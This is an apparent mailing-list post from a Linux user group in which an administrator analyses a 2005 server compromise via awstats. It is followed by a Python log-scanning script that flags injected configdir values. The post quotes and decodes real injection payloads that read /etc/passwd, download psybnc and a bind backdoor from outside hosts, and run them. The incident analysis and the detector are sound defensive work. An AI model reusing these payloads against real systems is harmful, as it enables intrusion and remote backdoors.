Thanks to everyone for the replies. They were useful to me.
The machine was compromised through awstats.
The compilation of psybnc did not succeed, but the tw port backdoor ran into no obstacles.

Here is the investigation I did:

This is from the Apache log file:

82.96.126.130 - - [22/Feb/2005:22:06:11 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2fgeocities%2ecom%2fsickady%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3bmake%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 14978 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:18 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fgeocities%2ecom%2fsickady%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 13307 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:54 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp%3bcd%20%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 2686 "-" "-"


In simpler terms, what is being executed above is this:

1. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;make;./psybnc;echo e_exp;%00
2. |echo ;echo b_exp;cd /tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;./psybnc;echo e_exp;%00
3. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd tw;./bind;echo Instalam bind in /tmp;cd /tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd rw;./bind;echo -------------------------;echo by Zorg of texter!;echo e_exp;%00


In other words:

1. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
make;
./psybnc;
echo e_exp;
%00

2. |echo ;
echo b_exp;
cd /tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
./psybnc;
echo e_exp;
%00

3. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd tw;
./bind;
echo Instalam bind in /tmp;
cd /tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd rw;
./bind;
echo -------------------------;
echo by Zorg of texter!;
echo e_exp;%00


After that I found them here:

/var/tmp# ls -alu
-rw-r--r--    1 nobody   nobody     605272 Feb 22 22:06 p.tgz
drwxr-xr-x   11 nobody   nobody       4096 Feb 22 22:06 psybnc
drwxr-xr-x    2 nobody   nobody       4096 Feb 22 22:04 tw
-rw-r--r--    1 nobody   nobody      16414 Feb 22 22:04 tw.tar.gz
-rwxr-xr-x    1 nobody   nobody      16414 Feb 22 22:06 x0b

/tmp# ls -alu
-rw-r--r--    1 nobody   nobody     605272 Feb 22 22:06 p.tgz
drwxr-xr-x   11 nobody   nobody       4096 Feb 22 22:09 psybnc
drwxr-xr-x    2 nobody   nobody       4096 Feb 22 22:06 tw
-rw-r--r--    1 nobody   nobody      16414 Feb 22 22:07 tw.tar.gz
-rwxr-xr-x    1 nobody   nobody      16414 Feb 22 22:07 x0b


Regards

============================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora
To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
============================================================================
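As an added example (not from the original post), a small Python script that automates what the poster did by hand: it parses Apache combined log lines, percent-decodes the awstats configdir parameter, flags values that start with a pipe or carry other shell metacharacters, and splits the injected snippet into one command per line. The sample log, the regex and the field names are my own constructions; only the request shape follows the entries quoted above.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache combined log: client ident user [time] "METHOD path proto" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# A legitimate configdir is a directory path; a pipe or another shell metacharacter
# means the value is being handed to a shell, which is what the entries above show.
SHELL_META = re.compile(r'[|;`$&]')


def decode_configdir(request_path):
    """Return the percent-decoded configdir parameter of an awstats.pl request, or None."""
    parts = urlsplit(request_path)
    if not parts.path.endswith("awstats.pl"):
        return None
    for param in parts.query.split("&"):      # split before decoding so %3b stays literal
        key, _, value = param.partition("=")
        if key == "configdir":
            return unquote(value)             # one decode: %2500 becomes the literal %00
    return None


def analyze_line(line):
    """Return a finding dict for an injected configdir, or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, method, path, status, size = m.groups()
    configdir = decode_configdir(path)
    if configdir is None or not SHELL_META.search(configdir):
        return None
    # Split the injected shell snippet into its individual commands, as the post does
    commands = [c.strip() for c in configdir.lstrip("|").split(";") if c.strip()]
    return {"client": client, "time": when, "status": status,
            "configdir": configdir, "commands": commands}


def scan(lines):
    return [f for f in map(analyze_line, lines) if f]


# Constructed sample log (not the poster's data): one normal awstats request,
# one injected configdir shaped like the quoted entries, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Feb/2005:21:58:03 +0200] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [22/Feb/2005:22:06:11 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bid%3buname%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1" 200 14978 "-" "-"
10.0.0.5 - - [22/Feb/2005:22:07:40 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['client']} status {f['status']}")
        for cmd in f["commands"]:
            print("   ", cmd)
```

Run it against a real access log with `scan(open(path).read().splitlines())`; a status 200 on a flagged line, as in the entries above, tells you the command string reached the shell.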
